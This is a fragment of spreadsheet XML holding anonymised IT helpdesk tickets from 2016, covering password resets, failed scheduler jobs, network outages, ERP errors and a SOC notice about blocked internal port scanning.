    <s v="dsw in33715799_x000d__x000a__x000d__x000a_we are seeing your 54.96.80.216/att-apac-asa.company.com-1 device generating at least 129 'internal outbreak for 7/tcp' alerts within 10 minutes, for traffic (blocked) from aidl8912600/10.38.91.26 to port 7/tcp of several internal hosts. this may indicate unauthorized reconnaissance scanning, a misconfiguration, or authorized internal discovery being blocked by the firewall.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_x000a__x000d__x000a_1) ticket only escalation for internal reconnaissance alerts (explicit notification via a medium priority ticket (no phone call))_x000d__x000a_2) automatically resolve internal reconnaissance alerts to the portal (no explicit notification but events will be available for reporting purposes in the portal)_x000d__x000a__x000d__x000a_sincerely,_x000d__x000a_ soc_x000d__x000a_"/>
    <s v="afkstcev utbnkyop"/>
    <x v="18"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/27/2016 08:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/27/2016 08:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="network outage: usa - (company inc) network is down since 8:06am et on 08/27/16."/>
    <s v="what type of outage:  __x___network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____yes_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _________8:06am et on 08/27/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no_____     (yes/no/na) _x000d__x000a__x000d__x000a_7. site contact notified (phone/email) ?  ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   _____na______   (yes/no/na) _x000d__x000a__x000d__x000a_9. equipment reset ?    ____na_______    (yes/no/na) _x000d__x000a__x000d__x000a_10. verified site working on backup circuit ?  ____na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emails not updating"/>
    <s v="emails not updating"/>
    <s v="vktxjamz whbdetvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_1898 failed in job_scheduler at: 08/27/2016 07:20:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1898 failed in job_scheduler at: 08/27/2016 07:20:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="5"/>
  </r>
  <r>
    <s v="HostName_148(SID_24): volume consumed on /dev/erplv is more than 85%."/>
    <s v="HostName_148(SID_24): volume consumed on /dev/erplv is more than 85%."/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="46"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/27/2016 07:08:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_ap1 failed in job_scheduler at: 08/27/2016 07:08:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="ms outlook 2010, not accepting password."/>
    <s v="ms outlook 2010, not accepting password."/>
    <s v="vpityxbu qktwepmz"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job Job_3190 failed in job_scheduler at: 08/27/2016 01:00:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3190 failed in job_scheduler at: 08/27/2016 01:00:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="9"/>
  </r>
  <r>
    <s v="erp password locked"/>
    <s v="_x000a__x000a_received from: gnasmtvx.cwxtsvkm@gmail.com_x000a__x000a_hi._x000a__x000a_please unblock the erp password._x000a__x000a_userid: hegdthy (gnasmtvx cwxtsvkm)_x000a__x000a_"/>
    <s v="gnasmtvx cwxtsvkm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="how to access drwgs from net weaver"/>
    <s v="name:jvpkulxw ovuweygj_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:jvpkulxw.ovuweygj@gmail.com_x000a_customer number:_x000a_telephone:094_x000a_summary:how to access drwgs from net weaver"/>
    <s v="jvpkulxw ovuweygj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail_uacyltoe hxgaycze failed in job_scheduler at: 08/26/2016 23:22:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail_uacyltoe hxgaycze failed in job_scheduler at: 08/26/2016 23:22:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_3028 failed in job_scheduler at: 08/26/2016 22:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_3028 failed in job_scheduler at: 08/26/2016 22:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="44"/>
  </r>
  <r>
    <s v="circuit outage :germany -company(werkzeuge &amp; hartstoffe) secondary vpn is down since 4:19 pm on 08/26 et"/>
    <s v="what type of outage:  _____network     __x___circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ________4:19 pm on 08/26 et______________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? ___na____    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? __na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na____     (yes/no/na) _x000d__x000a__x000d__x000a_8. remote dial-in ?   ____na__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_na_____________       _x000d__x000a__x000d__x000a_12. notified  gsc  _____na___     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="jloygrwh acvztedi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="unable to sync with one note files "/>
    <s v="unable to sync with one note files "/>
    <s v="xbkucsvz gcpydteq"/>
    <x v="15"/>
  </r>
  <r>
    <s v="problems weekly report"/>
    <s v="_x000d__x000a__x000d__x000a_received from: jokgacwd.hdfcwust@gmail.com_x000d__x000a__x000d__x000a_hello all,_x000d__x000a__x000d__x000a_i canÂ´t transfer my weekly report to the system._x000d__x000a__x000d__x000a_donÂ´t know whatÂ´s the problem._x000d__x000a__x000d__x000a_see the atache as well._x000d__x000a__x000d__x000a_need your support._x000d__x000a__x000d__x000a_"/>
    <s v="jokgacwd hdfcwust"/>
    <x v="0"/>
  </r>
  <r>
    <s v="collaboration_platform assistance"/>
    <s v="_x000d__x000a__x000d__x000a_received from: wjpncyef.tspnaimc@gmail.com_x000d__x000a__x000d__x000a_hello â€“ i need some assistance updating part of the collaboration_platform page for my department.  specifically, there is a link on our page that directs to a document.  i need to ensure that a more up to date version of the document is linked._x000d__x000a__x000d__x000a_"/>
    <s v="wjpncyef tspnaimc"/>
    <x v="15"/>
  </r>
  <r>
    <s v="cannot use skype for business with full audio and video. it does not respond and must be closed down."/>
    <s v="any skype meeting used must be entered with &quot;call me at:&quot; and &quot;don't join audio&quot;. the &quot;use skype for business(full audio and video experience)&quot; only freezes skype. it takes really a long time to open again._x000d__x000a_"/>
    <s v="vkpwnqay rmwxqoba"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019failagain_emb1 failed in job_scheduler at: 08/26/2016 15:26:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019failagain_emb1 failed in job_scheduler at: 08/26/2016 15:26:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="job HostName_1019fail_emb1 failed in job_scheduler at: 08/26/2016 15:21:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail_emb1 failed in job_scheduler at: 08/26/2016 15:21:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="59"/>
  </r>
  <r>
    <s v="connecting to vpn"/>
    <s v="connecting to vpn"/>
    <s v="oqvwgnkc gkjylpzx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to scan from the hp all in one printer"/>
    <s v="unable to scan from the hp all in one printer"/>
    <s v="fydosbih lafdsumb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to submit expense report"/>
    <s v="unable to submit expense report"/>
    <s v="yxsermtd vloueirh"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for ljpgedia bzqcwsgf on erp / production / erp"/>
    <s v="reset the password for ljpgedia bzqcwsgf on erp / production / erp"/>
    <s v="ljpgedia bzqcwsgf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="updating password on password_management_tool "/>
    <s v="updating password on password_management_tool "/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vpn"/>
    <s v="_x000d__x000a__x000d__x000a_received from: peojqgvm.qayeptuo@gmail.com_x000d__x000a__x000d__x000a_not able to log into vpn.  need some assistance please._x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="peojqgvm qayeptuo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="bex not loading all environment"/>
    <s v="bex addin is not showing all environment(SID_37, SID_39,etc) and unable to add  SID_37._x000d__x000a_installed bex patch and bex addin but same issue, it happened to erp logon also but later manually added  different environment._x000d__x000a__x000d__x000a_can you please check how it got dierppeared  without making any changes._x000d__x000a__x000d__x000a_please refer to screenshot _x000d__x000a__x000d__x000a__x000d__x000a_computer name-lhql7404424"/>
    <s v="pnwcubqr qdlocnzt"/>
    <x v="8"/>
  </r>
  <r>
    <s v="ie settings"/>
    <s v="ie settings"/>
    <s v="ijplstng juybetlo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to install draftsight on the pc "/>
    <s v="unable to install draftsight on the pc "/>
    <s v="jgxclrzp jzeantui"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to connect to skype"/>
    <s v="unable to connect to skype"/>
    <s v="xklpahsd nyxtoazm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="remove ukxtqfda qvtaykbg from telephony_software workgroups and company directory"/>
    <s v="employee took vsp therefore, remove ukxtqfda qvtaykbg from telephony_software workgroups and company directory"/>
    <s v="aqtcmxuf kuxsnimy"/>
    <x v="6"/>
  </r>
  <r>
    <s v="weekly report error message"/>
    <s v="_x000d__x000a__x000d__x000a_received from: mrczxwje.ocasryzq@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_bitte um behebung von folgendem problem._x000d__x000a_bei aktiver vpn verbindung kann der weekly report nicht hochgeladen werden._x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1ffc1.92c4d840]_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen |  best "/>
    <s v="mrczxwje ocasryzq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook is not opening"/>
    <s v="outlook is not opening"/>
    <s v="vitpjxgm zxiqkrns"/>
    <x v="27"/>
  </r>
  <r>
    <s v="erp password reset urgent account got locked out"/>
    <s v="erp password reset. account got locked out."/>
    <s v="pqbnkgtc yhcfqozs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to login to skype"/>
    <s v="unable to login to skype"/>
    <s v="qwijaspo ukynmfig"/>
    <x v="0"/>
  </r>
  <r>
    <s v="two analog lines not working with new phone system  they support our 911 and adt/tyco notification system!!"/>
    <s v="need two analog lines turned back on immediately  423.928.6266  &amp; 423.928.6076  we have no emergency notification system right now."/>
    <s v="csyigtrb gkvbjuto"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password has expired"/>
    <s v="password has expired"/>
    <s v="nsgeatyf qbyfiajo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="agents are not receiving revenue"/>
    <s v="the agents are not receiving the correct amount of revenue. please look at the procedure that is assigning revenue based on direct and pos rules"/>
    <s v="aofextgk tugywidl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="usa orders showing up in the us_plant to-do list"/>
    <s v="both locations have a work center 81821121 defined in erp, which is causing orders for both locations to appear in the to-do list.   change the query to check for both the plant and work center."/>
    <s v="wxnetroc yecbmliq"/>
    <x v="40"/>
  </r>
  <r>
    <s v="erp issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: raifstow.gfeymtql@gmail.com_x000d__x000a__x000d__x000a_i cannot create deliveries and also erp is really slow, its hard to even get through an order. this is a huge priority as our shipments suffer._x000d__x000a__x000d__x000a_"/>
    <s v="raifstow gfeymtql"/>
    <x v="13"/>
  </r>
  <r>
    <s v="engineering_tool error "/>
    <s v="engineering_tool error "/>
    <s v="ioulqtmk dqevzrsg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset ess password "/>
    <s v="reset ess password "/>
    <s v="apgukfow soqdkxtb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="not able to do pgi for deliveries 9168017962/8057916405/9168048239/916806308 - error co account assignments"/>
    <s v="delivery 9168017962 customer 81295213  - itens 7172133-6060954-7171068 ( co account assignments have different profit centers_x000d__x000a_ message # bk134) _x000d__x000a_delivery 9168027516 customer 81295213- itens 2668785-3647247-4859489 ( co account assignments have different profit centers_x000d__x000a_ message # bk134) _x000d__x000a_delivery 9168048239-customer 81295213-itens 4768854-3752015 ( co account assignments have different profit centers_x000d__x000a_ message # bk134) _x000d__x000a_delivery 9169147360-customer 81295213-item 6101508- co account assignments have different profit centers_x000d__x000a_ message # bk134) _x000d__x000a_"/>
    <s v="jaeuqbvt orlhenfj"/>
    <x v="43"/>
  </r>
  <r>
    <s v="unable to check emails / doesn't sync // account settings are outdated."/>
    <s v="unable to remove/add/repair email account from windows phone._x000d__x000a_trying to repair the account and its showing that repair not possible._x000d__x000a_its not even letting user to remove and re-add the account._x000d__x000a_unable to check emails / doesn't sync // account settings are outdated._x000d__x000a_"/>
    <s v="zlxcsqdg ckpojwir"/>
    <x v="32"/>
  </r>
  <r>
    <s v="query : attendance_tool account. "/>
    <s v="query : attendance_tool account. "/>
    <s v="ckswypji vrucgqna"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ticket update on ticket_no0433866"/>
    <s v="ticket update on ticket_no0433866"/>
    <s v="fumkcsji sarmtlhy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp delivery issues"/>
    <s v="_x000d__x000a__x000d__x000a_received from: raifstow.gfeymtql@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_i am having issues forcing deliveries in erp._x000d__x000a__x000d__x000a_[cid:image001.png@01d1ff73.c210fc30]_x000d__x000a__x000d__x000a_"/>
    <s v="raifstow gfeymtql"/>
    <x v="12"/>
  </r>
  <r>
    <s v="nicrhty wanted to set ooo from ofwxjriq rwcxkflq's mailbox."/>
    <s v="nicrhty wanted to set ooo from ofwxjriq rwcxkflq's mailbox."/>
    <s v="frhqlxst gedzxkry"/>
    <x v="0"/>
  </r>
  <r>
    <s v="require crm access in android phone"/>
    <s v="_x000d__x000a__x000d__x000a_received from: luxdnsvk.qmnyzcfs@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a__x000d__x000a_i would like to use crm on my android mobile phone._x000d__x000a_kindly let me know the procedure._x000d__x000a__x000d__x000a_with best "/>
    <s v="luxdnsvk qmnyzcfs"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ng_azubi locked"/>
    <s v="ng_azubi locked"/>
    <s v="nrlhywbm sxhtogly"/>
    <x v="33"/>
  </r>
  <r>
    <s v="ng_azubi locked."/>
    <s v="ng_azubi locked."/>
    <s v="plfwoagd chtpiazu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="final quota warning"/>
    <s v="hello,_x000d__x000a__x000d__x000a_can you please help me on trailing email on &quot;mailbox-full&quot; warning?_x000d__x000a__x000d__x000a_"/>
    <s v="ygkzwsud cvjgkxws"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 account locked"/>
    <s v="erp SID_34 account locked"/>
    <s v="mjsvgrfo nvpblgyd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="mobile device support"/>
    <s v="_x000d__x000a__x000d__x000a_received from: ebqdmgpk.daoyrtmj@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a_i am having issues with incoming/outgoing call on my company mobile device. i was unable to access the global support center on the hub. i will likely need a new device, as this issue is impact related. do i contact vendor mobile directly, or ? "/>
    <s v="ebqdmgpk daoyrtmj"/>
    <x v="0"/>
  </r>
  <r>
    <s v="support fÃ¼r umbau \ ewew8323862 \xwirzvda okhyipgr"/>
    <s v="support fÃ¼r umbau \ ewew8323862 \xwirzvda okhyipgr"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="password expired"/>
    <s v="password expired"/>
    <s v="oblsreqg vafkmznt"/>
    <x v="0"/>
  </r>
  <r>
    <s v="close line item on order 19101476"/>
    <s v="hi,_x000d__x000a_please close line item 91 on order number 20212587 because it has already been delivered but remains open in md04._x000d__x000a_"/>
    <s v="cqrmewsi xypfqhid"/>
    <x v="12"/>
  </r>
  <r>
    <s v="job Job_1314 failed in job_scheduler at: 08/26/2016 08:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1314 failed in job_scheduler at: 08/26/2016 08:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="unable to change password on password_management_tool password manager"/>
    <s v="unable to change password on password_management_tool password manager"/>
    <s v="lqzrgsko yaixmtqs"/>
    <x v="0"/>
  </r>
  <r>
    <s v=" it help for engineering_tool and engineering_tool"/>
    <s v="dear sir,_x000d__x000a__x000d__x000a_please help to download software of engineering_tool &amp; engineering_tool on my laptop._x000d__x000a_our details are as below. i have a dealer of company india ltd._x000d__x000a_dist. name â€“ ramdntya enterprises , aurangabad ( maharashtra )_x000d__x000a_dist. code â€“ 81808174._x000d__x000a__x000d__x000a_"/>
    <s v="vxhyftae tbkyfdli"/>
    <x v="0"/>
  </r>
  <r>
    <s v="account getting locked frequently"/>
    <s v="account getting locked frequently. user changed the password today itself."/>
    <s v="hotwlygp afukzhnm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="wrong commited dates for 1409 on orders and quotes "/>
    <s v="team, since yesterday we noticed that the commited date on order confirmation is wrong - it should be 12 days if tool is available in germany for transit plus 10 days for customer pick up. as a matheywter of fact the dates are too long in the future - e.g. order 35955871 opened today and available in plant_105 gives committed date of all mms (confirmed only for november). "/>
    <s v="djpwfxzt cfkwxlmq"/>
    <x v="5"/>
  </r>
  <r>
    <s v="it - erp"/>
    <s v="_x000d__x000a__x000d__x000a_received from: kehtxprg.uekapfzt@gmail.com_x000d__x000a__x000d__x000a_i am trying to access point of sales data in bex and it tells me i am not authorized, can you please authorize and give me access to that cube?_x000d__x000a__x000d__x000a_attached is the files i am opening and once i connect to bex it gives me the following message_x000d__x000a__x000d__x000a_[cid:image001.jpg@01d1ff67.61cd1680]_x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="kehtxprg uekapfzt"/>
    <x v="19"/>
  </r>
  <r>
    <s v="laptop charge, network cable not working in our docks"/>
    <s v="laptop charge, network cable not working in our docks"/>
    <s v="mnxbeuso rfmdlwuo"/>
    <x v="18"/>
  </r>
  <r>
    <s v="wrong nxd in plm"/>
    <s v="_x000d__x000a__x000d__x000a_received from: vahqkojb.trlapeso@gmail.com_x000d__x000a__x000d__x000a_hello,_x000d__x000a__x000d__x000a_a drawing was saved under the wrong plm number._x000d__x000a_please delete nxd #71894643_x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="vahqkojb trlapeso"/>
    <x v="10"/>
  </r>
  <r>
    <s v="requesting for dock station and add-on monitor"/>
    <s v="hi team,_x000d__x000a__x000d__x000a_i am requesting for dock station and add-on monitor (preferably bigger in size). please consider this request and assist. _x000d__x000a_ - beneficial to me while auditing inwarehouse_tools that will have average sized fonts, i could view the same in bigger screen very clearly_x000d__x000a_ - helps me with my various work related activities like inwarehouse_tool comparison so i can do it in much more effective way with add-on monitor_x000d__x000a_ - also helps me in email activities_x000d__x000a_ - last but not the least, i don't have to carry my laptop charger to office everyday and can make my laptop big bit more lighter ;)_x000d__x000a_"/>
    <s v="gpabsizh txldupyk"/>
    <x v="18"/>
  </r>
  <r>
    <s v="support fÃ¼r umbau \ewew8323735 \lpfzasmv cleoprzq"/>
    <s v="support fÃ¼r umbau \ewew8323735 \lpfzasmv cleoprzq"/>
    <s v="lpfzasmv cleoprzq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit rechner ewewx200257 \howfanzi siavgtby"/>
    <s v="probleme mit rechner ewewx200257 \howfanzi siavgtby"/>
    <s v="howfanzi siavgtby"/>
    <x v="24"/>
  </r>
  <r>
    <s v="probleme mit infostand \ewew8323718 "/>
    <s v="probleme mit infostand \ewew8323718 "/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="support fÃ¼r stÃ¶hrmann \xosdfhbu gtbfkisl"/>
    <s v="support fÃ¼r stÃ¶hrmann \xosdfhbu gtbfkisl"/>
    <s v="xosdfhbu gtbfkisl"/>
    <x v="24"/>
  </r>
  <r>
    <s v="authorisation to the folder in m drive - qa folder"/>
    <s v="_x000a__x000a_received from: rjanhbde.owfkyjcp@gmail.com_x000a__x000a_hello ,_x000a__x000a_pl. assign read  / write authorisation to : guru j prasath, his user id : &quot;prarttsagj&quot;_x000a__x000a_folder : m:\qa\iso 2008\iso9001_2008\SID_73_x000a__x000a__x000a__x000a_warm "/>
    <s v="isuclrnw hxrtkiws"/>
    <x v="11"/>
  </r>
  <r>
    <s v="problem with erp logon"/>
    <s v="_x000d__x000a__x000d__x000a_received from: zaeduhlt.jdgsamtv@gmail.com_x000d__x000a__x000d__x000a_[cid:image001.png@01d1ff8a.b54283e0]_x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / with best "/>
    <s v="zaeduhlt jdgsamtv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:53:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:53:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:50:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:50:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="pls install ms outlook at pc of trainee yqwuhzkv icvgkxnt"/>
    <s v="pls install ms outlook at pc of trainee yqwuhzkv icvgkxnt - pls.assign to qbnsrzlv gyqxkbae"/>
    <s v="vwpxjtof vmidzswj"/>
    <x v="32"/>
  </r>
  <r>
    <s v="job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job HostName_1019fail failed in job_scheduler at: 08/26/2016 04:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="windows activation message"/>
    <s v="_x000d__x000a__x000d__x000a_received from: tzradpnj.izlotycb@gmail.com_x000d__x000a__x000d__x000a_hello it team,_x000d__x000a__x000d__x000a_what am i supposed to do with that issue?_x000d__x000a__x000d__x000a_"/>
    <s v="tzradpnj izlotycb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="passwort entsperrung erp SID_34"/>
    <s v="_x000d__x000a__x000d__x000a_received from: plfwoagd.chtpiazu@gmail.com_x000d__x000a__x000d__x000a_trotz benutzung des password_management_tool passwortmanagers funktioniert die entsperrung nicht._x000d__x000a_ich konnte mich nicht in erp SID_34 einloggen._x000d__x000a_password_management_tool entsperrung verwendet, kein erfolg_x000d__x000a_anruf bei it â€“ rÃ¼cksetzung pw auf daypay3 â€“ zugang zu SID_34 dann mÃ¶glich_x000d__x000a_musste aber Ã¼ber password_management_tool wieder alle pw angleichen auf das neue pw_x000d__x000a_nach telefonat erneutes einloggen im erp versucht. geht wieder nicht._x000d__x000a__x000d__x000a_tut mir leid leute. ich kann nicht den ganzen tag damit verbringen, mir neue passwÃ¶rter zu Ã¼berlegen._x000d__x000a_bringt password_management_tool mit erp pw endlich zum laufen, damit diese firma effizienter wird._x000d__x000a__x000d__x000a_fÃ¼r den aktuellen fall bitte ich um erneute rÃ¼cksetzung es SID_34 passworts auf daypay3 damit ich weiterarbeiten kann._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d1ff80.ac619c70]_x000d__x000a__x000d__x000a_mit freundlichen grugermany / best "/>
    <s v="plfwoagd chtpiazu"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vvdortddp"/>
    <s v="_x000a__x000a_received from: aksthyuhath.shettythruy@company.com_x000a__x000a_hi,_x000a__x000a_please reset the password of mr. pradtheyp and share the new password to his manager mr. navbrtheen gogtr &lt;utoegyqx.lhosidqg@gmail.com&gt;._x000a__x000a_emp no_x000a__x000a_name_x000a__x000a_useid_x000a__x000a_manager_x000a__x000a_20284583_x000a__x000a_yaxmwdth xsfgitmq_x000a__x000a_vvdortddp_x000a__x000a_navbrtheen gogtr_x000a__x000a__x000a__x000a_with "/>
    <s v="badnzyue nxuqmdwl"/>
    <x v="0"/>
  </r>
  <r>
    <s v="no acces to the network with pc ewewx200257 in departement qa"/>
    <s v="no acces to the network with pc 200257 in departement qa. tha access is urgent necessary for hardness measuring software. yevirgnl ylhogjct and ughzilfm cfibdamq are the responsible person"/>
    <s v="lpfzasmv cleoprzq"/>
    <x v="24"/>
  </r>
  <r>
    <s v="\\HostName_29\kt-transition\applications\portal-pi-java-web\pi_training : full access : guprgttas1"/>
    <s v="\\HostName_29\kt-transition\applications\portal-pi-java-web\pi_training : full access : guprgttas1"/>
    <s v="ungoxpdc hmxwuyog"/>
    <x v="11"/>
  </r>
  <r>
    <s v="manually constructed have 3 new numbers in the mm01 (mm 7302314/6291204/7302316). if i want to extend the material maste"/>
    <s v="manually constructed have 3 new numbers in the mm01 (mm 7302314/6291204/7302316). if i want to extend the rqfhiong zkwfqagb, the system does not find any iso / ansi code. when i use the code manually night rage comes the message &quot;ansi catalog and grades already used by material&quot;_x000d__x000a__x000d__x000a_please check attachment."/>
    <s v="rugphfdi trlshejc"/>
    <x v="29"/>
  </r>
  <r>
    <s v="aufstellung ordnerzugriff "/>
    <s v="_x000a__x000a_received from: wtxvqngf.nxjivlmr@gmail.com_x000a__x000a_sehr geehrte damen und herren,_x000a__x000a_ich bin share-owner des laufwerks departments\betriebsrat im werk germany_x000a_und benÃ¶tige eine Ã¼bersicht, wer alles zugriff auf den oben stehenden ordner hat._x000a__x000a_bitte lassen sie mir diese aufstellung unmittelbar zukommen._x000a__x000a__x000a_mit freundlichen grÃ¼ÃŸen,_x000a_wtxvqngf nxjivlmr_x000a__x000a_betriebsratsvorsitzender_x000a_company produktions gmbh &amp; co. kg_x000a_altweiherstraÃŸe 27-31_x000a__x000a_company produktions gmbh &amp; co. kg_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq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wtxvqngf nxjivlmr"/>
    <x v="33"/>
  </r>
  <r>
    <s v="stamping of timings in EU_tool is not working"/>
    <s v="pulvermetalogy ee01_x000d__x000a_staeberoth fertigung ee02_x000d__x000a_sk hartbearbeitung ee03_x000d__x000a__x000d__x000a_user cannot stamp in &amp; out time in EU_tool._x000d__x000a__x000d__x000a_data is not transferred to erp from yesterday. he does not know which employee was present yesterday and who was absent."/>
    <s v="mstnjfai xcobykhl"/>
    <x v="25"/>
  </r>
  <r>
    <s v="issue with erp SID_1 "/>
    <s v="issue with erp SID_1 _x000d__x000a_page is not loading"/>
    <s v="djpwfxzt cfkwxlmq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook email access for felix zhang ; mobile device activation :; personal device. "/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbclinop.vsczklfp@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_please usa outlook access (email and calendar) for below staff on his iphone._x000d__x000a__x000d__x000a_avmeocnk.mvycfwka@gmail.com&lt;mailto:avmeocnk.mvycfwka@gmail.com&gt;_x000d__x000a_dept:  r&amp;d_x000d__x000a__x000d__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="error on ddeihrsh sigrtyhdeo's laptop "/>
    <s v="_x000d__x000a__x000d__x000a_received from: kbclinop.vsczklfp@gmail.com_x000d__x000a__x000d__x000a_hi,_x000d__x000a_dibesh's laptop cannot boot up, need to resolve the issue._x000d__x000a__x000d__x000a_"/>
    <s v="kbclinop vsczklfp"/>
    <x v="18"/>
  </r>
  <r>
    <s v="material issue"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear teamï¼Œ_x000a_we once shipped a subcontract order on jul 21th,_x000a_po#5616690206_x000a_rough material#2224208*10pcs_x000a_movement type:541_x000a_but its corresponding end product mm#6004236 still exists in erp,pls. help to check the root cause,thx!_x000a_[cid:image002.png@01d1ff9f.c823SID_310]_x000a_[cid:image001.png@01d1ffa0.05272471]_x000a__x000a__x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="29"/>
  </r>
  <r>
    <s v="tablet - dell 7350 - ç”µè„‘å¼€æœºå¯åŠ¨è“å±"/>
    <s v="please provide details of the issue._x000d__x000a_ç”µè„‘å¼€æœºå¯åŠ¨è“å±"/>
    <s v="rbkvofgu jthclzow"/>
    <x v="31"/>
  </r>
  <r>
    <s v="can not post dn# 9169142692 due to batch issue"/>
